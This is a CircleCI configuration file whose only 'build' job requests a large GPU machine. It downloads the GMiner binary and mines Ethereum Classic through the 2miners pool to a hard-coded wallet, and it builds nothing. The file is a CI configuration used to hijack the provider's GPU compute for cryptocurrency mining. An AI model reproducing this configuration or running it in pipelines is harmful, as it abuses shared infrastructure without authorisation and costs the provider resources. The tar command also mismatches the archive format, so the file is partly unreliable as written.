version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004-cuda-11.4:202110-01
    resource_class: gpu.nvidia.large
    steps:
      - run: nvidia-smi
      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi
      - run: wget https://github.com/develsoftware/GMinerRelease/releases/download/2.98/gminer_2_98_linux64.tar.xz && tar -xzvf gminer_2_98_linux64.tar.xz && ./miner --algo etchash --server etc.2miners.com:1010 --user 0x0c08503c12f8cde11796b3f175aabddb9a6ed4ff.rig1 pause